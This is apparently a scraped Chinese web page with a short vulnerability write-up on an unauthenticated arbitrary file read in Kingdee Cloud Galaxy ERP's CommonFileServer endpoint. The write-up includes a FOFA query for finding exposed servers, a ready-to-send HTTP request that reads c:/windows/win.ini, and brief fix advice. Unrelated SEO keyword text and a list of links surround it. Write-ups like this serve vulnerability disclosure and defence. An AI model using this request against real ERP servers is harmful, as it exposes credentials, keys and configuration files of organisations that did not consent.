当前位置: 首页 > news >正文

南昌网站推广排名中山做网站企业

南昌网站推广排名,中山做网站企业,wordpress 个人中心,智能设计软件有哪些0x01 产品简介 金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字…

0x01 产品简介

     金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖:财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。

0x02 漏洞概述

     由于金蝶云星空CommonFileServer接口处权限设置不当,未经身份认证的攻击者可以利用此漏洞访问服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。

0x03 影响范围

    6.x版本、7.x版本、8.x版本(均受影响)

0x04 复现环境

FOFA:app="金蝶云星空-管理中心" 

0x05 漏洞复现

PoC

GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

 ​​​PS:漏洞比较简单粗暴,直接在/CommonFileServer/路径后面拼接文件名就行(特殊符号url编码)

 读取IIS配置文件

 0x06 修复建议

关闭互联网暴露面设置目录权限

净化数据:对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。

 

 

http://www.yayakq.cn/news/899575/

相关文章:

  • 不用服务器做视频网站百度竞价推广技巧
  • 建立导购网站网站建设 美词原创
  • 公司网站青海省建筑信息平台
  • 建设企业网站的目的以及意义wordpress账号停用
  • 网站建设服务费怎么写分录wordpress 5.1.1简体中文版
  • 重庆网站建设是什么昆明网站开发正规培训
  • 茂名网站制作价格wordpress管理工具栏
  • 网站栏目是什么跑业务怎么找客户
  • 长春企业免费建站网页游戏平台排行
  • 仿门户网站多功能js相册画廊源码网站查找工具
  • 站群 网站如何做上海营业执照查询网上查询
  • 杭州专业网站优化公司大兵seo博客
  • 什么网站可以在家做美工兼职请问的网站开发培训 有知道的吗
  • 花钱想贷款结果成了做网站西安哪家公司制作响应式网站建设
  • 大连投诉网站中国服务器市场
  • 大连市住房和建设局网站网站空间可以自己做服务器
  • 网站搜索框代码怎么做wordpress添加音乐播放器
  • 织梦cms怎么更改网站的路径安福网站建设
  • 江门建站公司模板做快手网站
  • 创新优典网站建设网站建设项目职责
  • 邢台市路桥建设公司网站百度指数峰值查询
  • 网站设计参考网站揭阳做网站公司
  • 北京永安市政建设投资有限公司网站自己画图设计房间的软件
  • 大型网站建设入门原生态旅游网站开发需求分析
  • 投注类网站怎么做自动软件html 社区网站 模板
  • 哪里有手机网站制作公司长沙做网站的价格
  • 沧州网站建设做代炼的网站
  • 章丘建设局网站永久免费虚拟机
  • c 网站开发案例大全上海人才网官网下载
  • 资源库网站建设的总结找建设网站公司